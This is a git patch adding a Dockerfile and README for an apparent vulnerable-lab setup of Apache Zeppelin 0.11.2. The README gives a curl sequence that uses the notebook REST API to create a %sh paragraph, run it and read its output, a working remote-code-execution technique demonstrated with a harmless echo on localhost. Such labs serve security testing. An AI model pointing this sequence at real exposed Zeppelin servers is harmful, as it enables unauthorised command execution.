From 1f9e827fa472185219bc003f0f9770e2efe5f577 Mon Sep 17 00:00:00 2001
From: joernNNN <joernwege1@gmail.com>
Date: Fri, 8 Aug 2025 19:46:55 +0400
Subject: [PATCH] apache Zepplin exposed UI RCE

---
 apache/zeppelin/exposed_ui_RCE/Dockerfile | 35 ++++++++++++++++++++
 apache/zeppelin/exposed_ui_RCE/README.md  | 39 +++++++++++++++++++++++
 2 files changed, 74 insertions(+)
 create mode 100644 apache/zeppelin/exposed_ui_RCE/Dockerfile
 create mode 100644 apache/zeppelin/exposed_ui_RCE/README.md

diff --git a/apache/zeppelin/exposed_ui_RCE/Dockerfile b/apache/zeppelin/exposed_ui_RCE/Dockerfile
new file mode 100644
index 00000000..3e160c59
--- /dev/null
+++ b/apache/zeppelin/exposed_ui_RCE/Dockerfile
@@ -0,0 +1,35 @@
+# Use a base image for Apache Zeppelin
+FROM apache/zeppelin:0.11.2
+
+# Install necessary Python packages and Spark dependencies
+USER root
+
+# Install Python 3 and pip
+RUN apt-get update && apt-get install -y python3 python3-pip python3-dev && \
+    apt-get clean && rm -rf /var/lib/apt/lists/*
+
+# Install PySpark
+RUN pip3 install pyspark
+
+# Set environment variables for Spark and PySpark
+ENV SPARK_HOME=/opt/spark
+ENV PYSPARK_PYTHON=python3
+ENV PYSPARK_DRIVER_PYTHON=python3
+
+# Download and install Apache Spark
+RUN curl -O https://archive.apache.org/dist/spark/spark-3.4.0/spark-3.4.0-bin-hadoop3.tgz && \
+    tar -xzf spark-3.4.0-bin-hadoop3.tgz -C /opt/ && \
+    mv /opt/spark-3.4.0-bin-hadoop3 /opt/spark && \
+    rm spark-3.4.0-bin-hadoop3.tgz
+
+# Ensure Zeppelin config directory exists and update zeppelin-env.sh
+RUN mkdir -p /opt/zeppelin/conf && \
+    echo "export SPARK_HOME=/opt/spark" >> /opt/zeppelin/conf/zeppelin-env.sh && \
+    echo "export PYSPARK_PYTHON=python3" >> /opt/zeppelin/conf/zeppelin-env.sh && \
+    echo "export PYSPARK_DRIVER_PYTHON=python3" >> /opt/zeppelin/conf/zeppelin-env.sh
+
+# Expose the Zeppelin default port
+EXPOSE 8080
+
+# Entrypoint to start Zeppelin
+ENTRYPOINT ["/opt/zeppelin/bin/zeppelin.sh"]
diff --git a/apache/zeppelin/exposed_ui_RCE/README.md b/apache/zeppelin/exposed_ui_RCE/README.md
new file mode 100644
index 00000000..a88d16da
--- /dev/null
+++ b/apache/zeppelin/exposed_ui_RCE/README.md
@@ -0,0 +1,39 @@
+# Apache Zeppelin RCE via Notebook API
+
+1. Create docker container with Apache Zeppelin Notebook:
+   ```bash
+    docker build -t zeppelin-pyspark .
+    ```
+2. Run the following command to start Zeppelin Notebook
+    ```bash
+    docker run --name zeppelin-exposed-RCE --rm -p 8080:8080 zeppelin-pyspark
+    ```
+```bash
+# 1. Create a new notebook and capture its ID
+NOTEBOOK_ID=$(curl -X POST http://localhost:8080/api/notebook \
+  -H "Content-Type: application/json" \
+  -d '{"name": "Bash Command Example"}' | jq -r '.body')
+
+echo "Created notebook with ID: $NOTEBOOK_ID"
+
+# 2. Create a paragraph with our bash command
+PARAGRAPH_ID=$(curl -X POST "http://localhost:8080/api/notebook/$NOTEBOOK_ID/paragraph" \
+  -H "Content-Type: application/json" \
+  -d '{"title": "Echo Command", "text": "%sh\necho '\''hello RCE'\''"}' | jq -r '.body')
+
+echo "Created paragraph with ID: $PARAGRAPH_ID"
+
+# 3. Run the paragraph
+curl -X POST "http://localhost:8080/api/notebook/job/$NOTEBOOK_ID/$PARAGRAPH_ID"
+echo "Executing paragraph..."
+
+# 4. Wait a moment for execution to complete
+sleep 2
+
+# 5. Get the paragraph results to see the output
+curl -X GET "http://localhost:8080/api/notebook/$NOTEBOOK_ID/paragraph/$PARAGRAPH_ID" | jq '.body.results.msg[0].data'
+
+```
+
+Reference:
+- Zeppelin Notebook API: https://zeppelin.apache.org/docs/0.12.0/usage/rest_api/notebook#add-cron-job
\ No newline at end of file